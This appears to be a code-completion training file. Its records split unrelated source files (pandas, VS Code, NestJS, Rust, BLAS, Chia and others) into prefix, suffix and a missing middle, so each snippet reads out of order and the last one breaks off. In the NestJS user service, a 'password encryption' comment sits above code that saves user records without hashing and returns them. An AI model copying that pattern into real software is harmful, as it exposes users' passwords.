pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"FR": [
pd.to_datetime("2020-03-07 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"HR": [
pd.to_datetime("2020-03-21 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"IT": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"NL": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"PL": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
}
df_corona = (
pd.DataFrame.from_dict(d_corona, orient="index")
.reset_index()
.rename(
columns={0: "corona_start", 1: "corona_end", "index": "country"}
)
)
df = df.merge(df_corona, on="country", how="left")
# Add corona periods based on specified strategy
strategies_dict = {
"dn": ["during_corona", "no_corona"],
"pdp": ["pre_corona", "during_corona", "post_corona"],
}
if set(strategy) == set(strategies_dict["dn"]):
df["no_corona"] = (df[index_name] < df["corona_start"]) | (
df[index_name] > df["corona_end"]
)
elif set(strategy) == set(strategies_dict["pdp"]):
df["pre_corona"] = df[index_name] < df["corona_start"]
df["post_corona"] = df[index_name] > df["corona_end"]
else:
strategies = ""
for _, v in strategies_dict.items():
strategies += "['" + "', '".join(map(str, v)) + "'], "
strategies = strategies.rstrip(", ")
raise Exception(
f"Unsupported corona strategy. Expected one of: {strategies}"
)
df["during_corona"] = (df[index_name] >= df["corona_start"]) & (
df[index_name] <= df["corona_end"]
)
return df |
|
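A small usage sketch for add_corona_dates, assuming an hourly/daily load DataFrame with a 'date' column (passed as index_name) and a 'country' column; the column names and values below are illustrative, not from the original file.
# Illustrative only: flag rows as falling inside or outside the lockdown window.
import pandas as pd

df = pd.DataFrame({
    "date": pd.date_range("2020-03-01", periods=4, freq="7D"),
    "country": ["DE"] * 4,
    "load": [100.0, 90.0, 80.0, 95.0],
})
df = add_corona_dates(df, "date", strategy=["during_corona", "no_corona"])
print(df[["date", "during_corona", "no_corona"]])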
suggestController.ts | /*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*--------------------------------------------------------------------------------------------*/
'use strict';
import { alert } from 'vs/base/browser/ui/aria/aria';
import { isFalsyOrEmpty } from 'vs/base/common/arrays';
import { onUnexpectedError } from 'vs/base/common/errors';
import { KeyCode, KeyMod } from 'vs/base/common/keyCodes';
import { dispose, IDisposable } from 'vs/base/common/lifecycle';
import { ICodeEditor } from 'vs/editor/browser/editorBrowser';
import { EditorAction, EditorCommand, registerEditorAction, registerEditorCommand, registerEditorContribution, ServicesAccessor } from 'vs/editor/browser/editorExtensions';
import { EditOperation } from 'vs/editor/common/core/editOperation';
import { Range } from 'vs/editor/common/core/range';
import { IEditorContribution, ScrollType } from 'vs/editor/common/editorCommon';
import { EditorContextKeys } from 'vs/editor/common/editorContextKeys';
import { ISuggestSupport } from 'vs/editor/common/modes';
import { SnippetController2 } from 'vs/editor/contrib/snippet/snippetController2';
import { SnippetParser } from 'vs/editor/contrib/snippet/snippetParser';
import { SuggestMemories } from 'vs/editor/contrib/suggest/suggestMemory';
import * as nls from 'vs/nls';
import { ICommandService } from 'vs/platform/commands/common/commands';
import { ContextKeyExpr, IContextKeyService } from 'vs/platform/contextkey/common/contextkey';
import { IInstantiationService } from 'vs/platform/instantiation/common/instantiation';
import { KeybindingWeight } from 'vs/platform/keybinding/common/keybindingsRegistry';
import { ICompletionItem } from './completionModel';
import { Context as SuggestContext } from './suggest';
import { State, SuggestModel } from './suggestModel';
import { ISelectedSuggestion, SuggestWidget } from './suggestWidget';
class | {
private _disposables: IDisposable[] = [];
private _activeAcceptCharacters = new Set<string>();
private _activeItem: ISelectedSuggestion;
constructor(editor: ICodeEditor, widget: SuggestWidget, accept: (selected: ISelectedSuggestion) => any) {
this._disposables.push(widget.onDidShow(() => this._onItem(widget.getFocusedItem())));
this._disposables.push(widget.onDidFocus(this._onItem, this));
this._disposables.push(widget.onDidHide(this.reset, this));
this._disposables.push(editor.onWillType(text => {
if (this._activeItem) {
const ch = text[text.length - 1];
if (this._activeAcceptCharacters.has(ch) && editor.getConfiguration().contribInfo.acceptSuggestionOnCommitCharacter) {
accept(this._activeItem);
}
}
}));
}
private _onItem(selected: ISelectedSuggestion): void {
if (!selected || isFalsyOrEmpty(selected.item.suggestion.commitCharacters)) {
this.reset();
return;
}
this._activeItem = selected;
this._activeAcceptCharacters.clear();
for (const ch of selected.item.suggestion.commitCharacters) {
if (ch.length > 0) {
this._activeAcceptCharacters.add(ch[0]);
}
}
}
reset(): void {
this._activeItem = undefined;
}
dispose() {
dispose(this._disposables);
}
}
export class SuggestController implements IEditorContribution {
private static readonly ID: string = 'editor.contrib.suggestController';
public static get(editor: ICodeEditor): SuggestController {
return editor.getContribution<SuggestController>(SuggestController.ID);
}
private _model: SuggestModel;
private _widget: SuggestWidget;
private _memory: SuggestMemories;
private _toDispose: IDisposable[] = [];
private readonly _sticky = false; // for development purposes only
constructor(
private _editor: ICodeEditor,
@ICommandService private readonly _commandService: ICommandService,
@IContextKeyService private readonly _contextKeyService: IContextKeyService,
@IInstantiationService private readonly _instantiationService: IInstantiationService,
) {
this._model = new SuggestModel(this._editor);
this._memory = _instantiationService.createInstance(SuggestMemories, this._editor.getConfiguration().contribInfo.suggestSelection);
this._toDispose.push(this._model.onDidTrigger(e => {
if (!this._widget) {
this._createSuggestWidget();
}
this._widget.showTriggered(e.auto);
}));
this._toDispose.push(this._model.onDidSuggest(e => {
let index = this._memory.select(this._editor.getModel(), this._editor.getPosition(), e.completionModel.items);
this._widget.showSuggestions(e.completionModel, index, e.isFrozen, e.auto);
}));
this._toDispose.push(this._model.onDidCancel(e => {
if (this._widget && !e.retrigger) {
this._widget.hideWidget();
}
}));
this._toDispose.push(this._editor.onDidBlurEditorText(() => {
if (!this._sticky) {
this._model.cancel();
}
}));
// Manage the acceptSuggestionsOnEnter context key
let acceptSuggestionsOnEnter = SuggestContext.AcceptSuggestionsOnEnter.bindTo(_contextKeyService);
let updateFromConfig = () => {
const { acceptSuggestionOnEnter, suggestSelection } = this._editor.getConfiguration().contribInfo;
acceptSuggestionsOnEnter.set(acceptSuggestionOnEnter === 'on' || acceptSuggestionOnEnter === 'smart');
this._memory.setMode(suggestSelection);
};
this._toDispose.push(this._editor.onDidChangeConfiguration((e) => updateFromConfig()));
updateFromConfig();
}
private _createSuggestWidget(): void {
this._widget = this._instantiationService.createInstance(SuggestWidget, this._editor);
this._toDispose.push(this._widget.onDidSelect(this._onDidSelectItem, this));
// Wire up logic to accept a suggestion on certain characters
const autoAcceptOracle = new AcceptOnCharacterOracle(this._editor, this._widget, item => this._onDidSelectItem(item));
this._toDispose.push(
autoAcceptOracle,
this._model.onDidSuggest(e => {
if (e.completionModel.items.length === 0) {
autoAcceptOracle.reset();
}
})
);
let makesTextEdit = SuggestContext.MakesTextEdit.bindTo(this._contextKeyService);
this._toDispose.push(this._widget.onDidFocus(({ item }) => {
const position = this._editor.getPosition();
const startColumn = item.position.column - item.suggestion.overwriteBefore;
const endColumn = position.column;
let value = true;
if (
this._editor.getConfiguration().contribInfo.acceptSuggestionOnEnter === 'smart'
&& this._model.state === State.Auto
&& !item.suggestion.command
&& !item.suggestion.additionalTextEdits
&& item.suggestion.snippetType !== 'textmate'
&& endColumn - startColumn === item.suggestion.insertText.length
) {
const oldText = this._editor.getModel().getValueInRange({
startLineNumber: position.lineNumber,
startColumn,
endLineNumber: position.lineNumber,
endColumn
});
value = oldText !== item.suggestion.insertText;
}
makesTextEdit.set(value);
}));
this._toDispose.push({
dispose() { makesTextEdit.reset(); }
});
}
getId(): string {
return SuggestController.ID;
}
dispose(): void {
this._toDispose = dispose(this._toDispose);
if (this._widget) {
this._widget.dispose();
this._widget = null;
}
if (this._model) {
this._model.dispose();
this._model = null;
}
}
protected _onDidSelectItem(event: ISelectedSuggestion): void {
if (!event || !event.item) {
this._model.cancel();
return;
}
const { suggestion, position } = event.item;
const editorColumn = this._editor.getPosition().column;
const columnDelta = editorColumn - position.column;
// pushing undo stops *before* additional text edits and
// *after* the main edit
this._editor.pushUndoStop();
if (Array.isArray(suggestion.additionalTextEdits)) {
this._editor.executeEdits('suggestController.additionalTextEdits', suggestion.additionalTextEdits.map(edit => EditOperation.replace(Range.lift(edit.range), edit.text)));
}
// keep item in memory
this._memory.memorize(this._editor.getModel(), this._editor.getPosition(), event.item);
let { insertText } = suggestion;
if (suggestion.snippetType !== 'textmate') {
insertText = SnippetParser.escape(insertText);
}
SnippetController2.get(this._editor).insert(
insertText,
suggestion.overwriteBefore + columnDelta,
suggestion.overwriteAfter,
false, false,
!suggestion.noWhitespaceAdjust
);
this._editor.pushUndoStop();
if (!suggestion.command) {
// done
this._model.cancel();
} else if (suggestion.command.id === TriggerSuggestAction.id) {
			// retrigger
this._model.trigger({ auto: true }, true);
} else {
// exec command, done
this._commandService.executeCommand(suggestion.command.id, ...suggestion.command.arguments).then(undefined, onUnexpectedError);
this._model.cancel();
}
this._alertCompletionItem(event.item);
}
private _alertCompletionItem({ suggestion }: ICompletionItem): void {
let msg = nls.localize('arai.alert.snippet', "Accepting '{0}' did insert the following text: {1}", suggestion.label, suggestion.insertText);
alert(msg);
}
triggerSuggest(onlyFrom?: ISuggestSupport[]): void {
this._model.trigger({ auto: false }, false, onlyFrom);
this._editor.revealLine(this._editor.getPosition().lineNumber, ScrollType.Smooth);
this._editor.focus();
}
acceptSelectedSuggestion(): void {
if (this._widget) {
const item = this._widget.getFocusedItem();
this._onDidSelectItem(item);
}
}
cancelSuggestWidget(): void {
if (this._widget) {
this._model.cancel();
this._widget.hideWidget();
}
}
selectNextSuggestion(): void {
if (this._widget) {
this._widget.selectNext();
}
}
selectNextPageSuggestion(): void {
if (this._widget) {
this._widget.selectNextPage();
}
}
selectLastSuggestion(): void {
if (this._widget) {
this._widget.selectLast();
}
}
selectPrevSuggestion(): void {
if (this._widget) {
this._widget.selectPrevious();
}
}
selectPrevPageSuggestion(): void {
if (this._widget) {
this._widget.selectPreviousPage();
}
}
selectFirstSuggestion(): void {
if (this._widget) {
this._widget.selectFirst();
}
}
toggleSuggestionDetails(): void {
if (this._widget) {
this._widget.toggleDetails();
}
}
toggleSuggestionFocus(): void {
if (this._widget) {
this._widget.toggleDetailsFocus();
}
}
}
export class TriggerSuggestAction extends EditorAction {
static readonly id = 'editor.action.triggerSuggest';
constructor() {
super({
id: TriggerSuggestAction.id,
label: nls.localize('suggest.trigger.label', "Trigger Suggest"),
alias: 'Trigger Suggest',
precondition: ContextKeyExpr.and(EditorContextKeys.writable, EditorContextKeys.hasCompletionItemProvider),
kbOpts: {
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyMod.CtrlCmd | KeyCode.Space,
mac: { primary: KeyMod.WinCtrl | KeyCode.Space },
weight: KeybindingWeight.EditorContrib
}
});
}
public run(accessor: ServicesAccessor, editor: ICodeEditor): void {
const controller = SuggestController.get(editor);
if (!controller) {
return;
}
controller.triggerSuggest();
}
}
registerEditorContribution(SuggestController);
registerEditorAction(TriggerSuggestAction);
const weight = KeybindingWeight.EditorContrib + 90;
const SuggestCommand = EditorCommand.bindToContribution<SuggestController>(SuggestController.get);
registerEditorCommand(new SuggestCommand({
id: 'acceptSelectedSuggestion',
precondition: SuggestContext.Visible,
handler: x => x.acceptSelectedSuggestion(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.Tab
}
}));
registerEditorCommand(new SuggestCommand({
id: 'acceptSelectedSuggestionOnEnter',
precondition: SuggestContext.Visible,
handler: x => x.acceptSelectedSuggestion(),
kbOpts: {
weight: weight,
kbExpr: ContextKeyExpr.and(EditorContextKeys.textInputFocus, SuggestContext.AcceptSuggestionsOnEnter, SuggestContext.MakesTextEdit),
primary: KeyCode.Enter
}
}));
registerEditorCommand(new SuggestCommand({
id: 'hideSuggestWidget',
precondition: SuggestContext.Visible,
handler: x => x.cancelSuggestWidget(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.Escape,
secondary: [KeyMod.Shift | KeyCode.Escape]
}
}));
registerEditorCommand(new SuggestCommand({
id: 'selectNextSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectNextSuggestion(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.DownArrow,
secondary: [KeyMod.CtrlCmd | KeyCode.DownArrow],
mac: { primary: KeyCode.DownArrow, secondary: [KeyMod.CtrlCmd | KeyCode.DownArrow, KeyMod.WinCtrl | KeyCode.KEY_N] }
}
}));
registerEditorCommand(new SuggestCommand({
id: 'selectNextPageSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectNextPageSuggestion(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.PageDown,
secondary: [KeyMod.CtrlCmd | KeyCode.PageDown]
}
}));
registerEditorCommand(new SuggestCommand({
id: 'selectLastSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectLastSuggestion()
}));
registerEditorCommand(new SuggestCommand({
id: 'selectPrevSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectPrevSuggestion(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.UpArrow,
secondary: [KeyMod.CtrlCmd | KeyCode.UpArrow],
mac: { primary: KeyCode.UpArrow, secondary: [KeyMod.CtrlCmd | KeyCode.UpArrow, KeyMod.WinCtrl | KeyCode.KEY_P] }
}
}));
registerEditorCommand(new SuggestCommand({
id: 'selectPrevPageSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectPrevPageSuggestion(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.PageUp,
secondary: [KeyMod.CtrlCmd | KeyCode.PageUp]
}
}));
registerEditorCommand(new SuggestCommand({
id: 'selectFirstSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectFirstSuggestion()
}));
registerEditorCommand(new SuggestCommand({
id: 'toggleSuggestionDetails',
precondition: SuggestContext.Visible,
handler: x => x.toggleSuggestionDetails(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyMod.CtrlCmd | KeyCode.Space,
mac: { primary: KeyMod.WinCtrl | KeyCode.Space }
}
}));
registerEditorCommand(new SuggestCommand({
id: 'toggleSuggestionFocus',
precondition: SuggestContext.Visible,
handler: x => x.toggleSuggestionFocus(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyMod.CtrlCmd | KeyMod.Alt | KeyCode.Space,
mac: { primary: KeyMod.WinCtrl | KeyMod.Alt | KeyCode.Space }
}
}));
| AcceptOnCharacterOracle |
test_settings_mapping_extended.py | # coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
ref: https://github.com/swagger-api/swagger-codegen
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.settings_mapping_extended import SettingsMappingExtended
class TestSettingsMappingExtended(unittest.TestCase):
""" SettingsMappingExtended unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testSettingsMappingExtended(self):
|
if __name__ == '__main__':
unittest.main() | """
Test SettingsMappingExtended
"""
model = swagger_client.models.settings_mapping_extended.SettingsMappingExtended() |
usuario.service.ts |
import { UsuarioI } from './../interfaces/usuario.interface';
import { Injectable, Res, HttpStatus, Req, NotFoundException } from '@nestjs/common';
import { request, response, json } from 'express';
import { UsuarioC } from '../dto/usuario.dto';
import { InjectModel } from '@nestjs/mongoose';
import { Model } from "mongoose";
@Injectable()
export class | {
public usuario:UsuarioC[];
constructor(@InjectModel('Usuarios') private readonly uM :Model<UsuarioI>){}
async getUsuarios(@Res() res=response):Promise<any>{
try {
const usuarioDB = await this.uM.find();
return res.status(HttpStatus.OK).json({
ok:true,
usuarios:usuarioDB
});
} catch (error) {
console.log(error)
return res.status(HttpStatus.NOT_FOUND).json({
ok:false,
msg:'Error del servidor'
});
}
}
async getUsuario(@Res()res = response,id:string):Promise<any>{
try {
const usuarioDB = await this.uM.findById(id);
if(!usuarioDB){
return res.status(HttpStatus.NOT_FOUND).json({
ok:false,
msg:'el usuario no existe'
});
}
return res.status(HttpStatus.OK).json({
ok:true,
usuario:usuarioDB
})
} catch (error) {
console.log(error);
return res.status(HttpStatus.NOT_FOUND).json({
ok:false,
msg:'Error del servidor'
});
}
}
async postUsuario(@Req() req=request,@Res() res=response,usuario:UsuarioC):Promise<any>{
try {
            // email validation: reject registration with an already used email
const correo = usuario.correo;
const emailDB = await this.uM.findOne({correo});
if(emailDB){
return res.status(HttpStatus.UNAUTHORIZED).json({
ok:false,
msg:'El correo ya esta registrado'
});
}
            // password encryption
const usuarioDB = new this.uM(usuario);
await usuarioDB.save();
return res.status(HttpStatus.OK).json({
ok:true,
msg:'Usuario creado correctamente',
usuario:usuarioDB
})
} catch (error) {
console.log(error);
return res.status(HttpStatus.INTERNAL_SERVER_ERROR).json({
ok:false,
msg:'Error interno del servidor'
})
}
}
async putUsuario(@Req() req=request,@Res() res=response,usuario:UsuarioC, id:string):Promise<any>{
try {
            // user validation: make sure the user exists
const idDB = await this.uM.findById(id);
if(!idDB){
return res.status(HttpStatus.UNAUTHORIZED).json({
ok:false,
msg:'El usuario no existe'
})
}
            // email validation: if the email changed, make sure it is not already registered
            const correo = usuario.correo;
            if(correo !== idDB.correo){
                const emailDB = await this.uM.findOne({correo});
                if(emailDB){
                    return res.status(HttpStatus.UNAUTHORIZED).json({
                        ok:false,
                        msg:'El correo ya esta registrado'
                    })
                }
            }
            // update the user document
const usuarioDB = await this.uM.findByIdAndUpdate(id,usuario,{new:true})
return res.status(HttpStatus.OK).json({
ok:true,
msg:'Usuario Actualizado correctamente',
usuario:usuarioDB
});
} catch (error) {
return res.status(HttpStatus.INTERNAL_SERVER_ERROR).json({
ok:false,
msg:'Error interno del servidor'
});
}
}
async deleteUsuario(@Req() req=request,@Res() res=response, id):Promise<any>{
try {
            // user validation: make sure the user exists
const idDB = await this.uM.findById(id);
console.log(id);
if(!idDB){
return res.status(HttpStatus.UNAUTHORIZED).json({
ok:false,
msg:'El usuario no existe'
})
}
const usuarioDB = await this.uM.findByIdAndRemove(id);
return res.status(HttpStatus.OK).json({
ok:true,
msg:`El usuario con id ${id} fue eliminado correctamente`
})
} catch (error) {
return res.status(HttpStatus.INTERNAL_SERVER_ERROR).json({
ok:false,
msg:'Error interno del servidor'
})
}
}
}
| UsuarioService |
4-1-1.custom.function.py | from easygraphics.turtle import *
def arcl(side, degree):
for i in range(degree):
fd(side) | lt(1)
def arcr(side, degree):
for i in range(degree):
fd(side)
rt(1)
def main():
create_world(800, 600)
set_speed(50)
arcr(2, 90)
arcl(2, 90)
pause()
close_world()
easy_run(main) | |
signupUserProcess.js | import { UNPAID_STATE, WIZARD_ENABLED } from '../../constants';
import { API_CUSTOM_ERROR_CODES } from '../../errors';
/* @ngInject */
function | (
$location,
AppModel,
dispatchers,
gettextCatalog,
settingsApi,
signupModel,
authentication,
lazyLoader,
Address,
$state,
setupKeys,
notification
) {
const CACHE = {};
const { dispatcher } = dispatchers(['signup']);
const dispatch = (type, data = {}) => dispatcher.signup(type, data);
const I18N = {
ERROR_ADDRESS_CREATION: gettextCatalog.getString('Something went wrong during address creation', null, 'Error'),
ERROR_PROCESS: gettextCatalog.getString('Something went wrong', null, 'Error')
};
async function doCreateUser(model) {
dispatch('create.user', { value: true });
try {
const { data } = await signupModel.createUser(model);
return data;
} catch (e) {
const { data = {} } = e;
// Failed Human verification
if (data.Code === API_CUSTOM_ERROR_CODES.USER_CREATE_TOKEN_INVALID) {
dispatch('creating', { value: false });
dispatch('chech.humanity', { value: true });
return Promise.reject({
error: new Error(data.Error),
verbose: false
});
}
return Promise.reject({
error: new Error(data.Error),
verbose: true
});
}
}
async function setUserLanguage() {
if ($location.search().language) {
return settingsApi.updateLocale({ Locale: gettextCatalog.getCurrentLanguage() });
}
}
function doLogUserIn() {
dispatch('loguserin', { value: true });
return authentication
.loginWithCredentials({
Username: signupModel.get('username'),
Password: signupModel.getPassword()
})
.then(({ data }) => {
authentication.receivedCredentials(data);
return authentication.setAuthCookie(data);
})
.then(() => {
AppModel.set('isLoggedIn', authentication.isLoggedIn());
AppModel.set('isLocked', authentication.isLocked());
AppModel.set('isSecure', authentication.isSecured());
});
}
async function doAccountSetup() {
dispatch('setup.account', { value: true });
try {
const { data } = await Address.setup({ Domain: signupModel.getDomain() });
CACHE.setupPayload.keys[0].AddressID = data.Address.ID;
return setupKeys.setup(CACHE.setupPayload, signupModel.getPassword()).then(() => {
authentication.savePassword(CACHE.setupPayload.mailboxPassword);
AppModel.set('isLoggedIn', authentication.isLoggedIn());
AppModel.set('isLocked', authentication.isLocked());
AppModel.set('isSecure', authentication.isSecured());
return data;
});
} catch (err) {
const { data = {} } = err;
if (data.Error) {
throw new Error(data.Error);
}
throw err;
}
}
async function doGetUserInfo() {
dispatch('user.get', { value: true });
await lazyLoader.app();
return authentication.fetchUserInfo();
}
function finishRedirect() {
dispatch('user.finish', { value: true });
delete CACHE.setupPayload;
if (authentication.user.Delinquent < UNPAID_STATE.DELINQUENT) {
return $state.go('secured.inbox', { welcome: WIZARD_ENABLED });
}
$state.go('secured.dashboard');
}
const createAddress = async () => {
try {
return await doLogUserIn().then(doAccountSetup);
} catch (e) {
const { data = {} } = e;
if (data.Error) {
return Promise.reject({
error: new Error(data.Error || I18N.ERROR_ADDRESS_CREATION),
verbose: true,
redirect: 'login'
});
}
throw e;
}
};
const create = async (model) => {
await doCreateUser(model);
await createAddress();
return setUserLanguage()
.then(doGetUserInfo)
.then(finishRedirect);
};
function generateNewKeys() {
dispatch('generate.newkeys', { value: true });
return setupKeys
.generate([{ ID: 0, Email: signupModel.getEmail() }], signupModel.getPassword())
.then((result) => (CACHE.setupPayload = result));
}
const createAccount = (model) => {
create(model).catch((e) => {
notification.error(e.error ? e.error.message : I18N.ERROR_PROCESS);
dispatch('signup.error', { value: true });
console.error(e);
e.redirect && $state.go(e.redirect);
});
};
return { createAccount, generateNewKeys };
}
export default signupUserProcess;
| signupUserProcess |
scnrm2.py | import numpy as np
from ..util import slice_
def scnrm2(N, X, INCX):
"""Computes the Euclidean norm of the vector x
Parameters
----------
N : int
Number of elements in input vector
X : numpy.ndarray
A single precision complex array, dimension (1 + (`N` - 1)*abs(`INCX`))
INCX : int
Storage spacing between elements of `X`
Returns
-------
numpy.single
See Also
--------
snrm2 : Single-precision real euclidean norm
dnrm2 : Double-precision real euclidean norm
dznrm2 : Double-precision complex euclidean norm
Notes
-----
Online PyBLAS documentation: https://nbviewer.jupyter.org/github/timleslie/pyblas/blob/main/docs/scnrm2.ipynb
Reference BLAS documentation: https://github.com/Reference-LAPACK/lapack/blob/v3.9.0/BLAS/SRC/scnrm2.f
Examples
--------
>>> x = np.array([1+2j, 2+3j, 3+4j], dtype=np.complex64)
>>> N = len(x)
>>> incx = 1
    >>> print(scnrm2(N, x, incx))
6.5574384
"""
if N <= 0:
|
    # Note: This implementation suffers from potential overflow errors for large vector values.
# More sophisticated implementations can avoid this with appropriate scaling applied before
# taking the square of large values.
return np.sqrt((X[slice_(N, INCX)].conj() * X[slice_(N, INCX)]).sum().real)
| return 0 |
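A short sanity check of scnrm2 against numpy's own Euclidean norm, reusing the example values from the docstring above.
# Illustrative only: scnrm2 should agree with numpy's norm for complex single-precision input.
import numpy as np

x = np.array([1 + 2j, 2 + 3j, 3 + 4j], dtype=np.complex64)
assert np.isclose(scnrm2(len(x), x, 1), np.linalg.norm(x))  # both are ~6.557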
asyncstr.rs | use std::{io, pin::Pin, str};
use futures::{
io::BufReader,
task::{Context, Poll},
AsyncBufRead, AsyncRead,
};
#[derive(thiserror::Error, Debug)]
pub(crate) enum Error {
#[error(transparent)]
IoError(#[from] io::Error),
#[error(transparent)]
Utf8Error(#[from] str::Utf8Error),
}
pin_project_lite::pin_project! {
pub(crate) struct AsyncStrReader<R> {
#[pin]
inner: BufReader<R>,
}
}
impl<R: AsyncRead + Unpin> AsyncStrReader<R> {
#[inline]
pub(crate) fn new(inner: R) -> Self {
Self {
inner: BufReader::new(inner),
}
}
#[inline]
pub(crate) fn with_capacity(capacity: usize, inner: R) -> Self {
Self {
inner: BufReader::with_capacity(capacity, inner),
}
}
pub(crate) fn poll_fill_buf(
self: Pin<&mut Self>,
cx: &mut Context<'_>,
) -> Poll<Result<&str, Error>> {
let this = self.project();
match this.inner.poll_fill_buf(cx) {
Poll::Ready(Ok(buf)) => {
match str::from_utf8(buf) {
Ok(s) => Poll::Ready(Ok(s)),
Err(err) => {
// The data is just plain invalid unicode
if err.error_len().is_some() {
Poll::Ready(Err(err.into()))
} else {
let valid_len = err.valid_up_to();
// Safety: We know the string is partially valid
// up to `valid_len`
unsafe { Poll::Ready(Ok(str::from_utf8_unchecked(&buf[..valid_len]))) }
}
}
}
}
Poll::Ready(Err(err)) => Poll::Ready(Err(err.into())),
Poll::Pending => {
cx.waker().wake_by_ref();
Poll::Pending
}
}
}
#[inline]
pub(crate) fn | (self: Pin<&mut Self>, amt: usize) {
let this = self.project();
this.inner.consume(amt);
}
}
#[cfg(test)]
mod tests {
use futures::{io::Cursor, task};
use super::*;
fn cx<'a>() -> Context<'a> {
Context::from_waker(task::noop_waker_ref())
}
fn assert_str<R: AsyncRead + Unpin>(
cx: &mut Context<'_>,
buf: &mut AsyncStrReader<R>,
s: &str,
) {
let mut buf = Pin::new(buf);
assert!(matches!(
buf.as_mut().poll_fill_buf(cx),
Poll::Ready(Ok(ss)) if ss == s
));
buf.consume(s.len());
}
fn assert_utf8_error<R: AsyncRead + Unpin>(cx: &mut Context<'_>, buf: &mut AsyncStrReader<R>) {
assert!(matches!(
Pin::new(buf).poll_fill_buf(cx),
Poll::Ready(Err(Error::Utf8Error(_)))
));
}
#[test]
fn empty() {
let mut cx = cx();
let mut buf = AsyncStrReader::new(Cursor::new(""));
assert_str(&mut cx, &mut buf, "");
}
#[test]
fn single_char() {
let mut cx = cx();
let mut buf = AsyncStrReader::new(Cursor::new("a"));
assert_str(&mut cx, &mut buf, "a");
assert_str(&mut cx, &mut buf, "");
}
#[test]
fn single_multibyte_char() {
let mut cx = cx();
let mut buf = AsyncStrReader::new(Cursor::new("ท"));
assert_str(&mut cx, &mut buf, "ท");
assert_str(&mut cx, &mut buf, "");
}
#[test]
fn word() {
let mut cx = cx();
let mut buf = AsyncStrReader::new(Cursor::new("hello"));
assert_str(&mut cx, &mut buf, "hello");
assert_str(&mut cx, &mut buf, "");
}
#[test]
fn invalid_sequence() {
let mut cx = cx();
let mut buf = AsyncStrReader::new(Cursor::new([0xe2, 0x28, 0xa1]));
assert_utf8_error(&mut cx, &mut buf);
}
#[test]
fn buffer_full() {
let mut cx = cx();
let mut buf = AsyncStrReader::with_capacity(5, Cursor::new("helloworld"));
assert_str(&mut cx, &mut buf, "hello");
assert_str(&mut cx, &mut buf, "world");
assert_str(&mut cx, &mut buf, "");
}
}
| consume |
farmer_api.py | import json
import time
from typing import Callable, Optional, List, Any, Dict
import aiohttp
from blspy import AugSchemeMPL, G2Element, PrivateKey
import chia.server.ws_connection as ws
from chia.consensus.pot_iterations import calculate_iterations_quality, calculate_sp_interval_iters
from chia.farmer.farmer import Farmer
from chia.protocols import farmer_protocol, harvester_protocol
from chia.protocols.harvester_protocol import PoolDifficulty
from chia.protocols.pool_protocol import (
get_current_authentication_token,
PoolErrorCode,
PostPartialRequest,
PostPartialPayload,
)
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.server.outbound_message import NodeType, make_msg
from chia.server.server import ssl_context_for_root
from chia.ssl.create_ssl import get_mozilla_ca_crt
from chia.types.blockchain_format.pool_target import PoolTarget
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.util.api_decorators import api_request, peer_required
from chia.util.ints import uint32, uint64
class | :
farmer: Farmer
def __init__(self, farmer) -> None:
self.farmer = farmer
def _set_state_changed_callback(self, callback: Callable):
self.farmer.state_changed_callback = callback
@api_request
@peer_required
async def new_proof_of_space(
self, new_proof_of_space: harvester_protocol.NewProofOfSpace, peer: ws.WSChiaConnection
):
"""
This is a response from the harvester, for a NewChallenge. Here we check if the proof
of space is sufficiently good, and if so, we ask for the whole proof.
"""
if new_proof_of_space.sp_hash not in self.farmer.number_of_responses:
self.farmer.number_of_responses[new_proof_of_space.sp_hash] = 0
self.farmer.cache_add_time[new_proof_of_space.sp_hash] = uint64(
int(time.time()))
max_pos_per_sp = 5
if self.farmer.number_of_responses[new_proof_of_space.sp_hash] > max_pos_per_sp:
# This will likely never happen for any farmer with less than 10% of global space
# It's meant to make testnets more stable
self.farmer.log.info(
f"Surpassed {max_pos_per_sp} PoSpace for one SP, no longer submitting PoSpace for signage point "
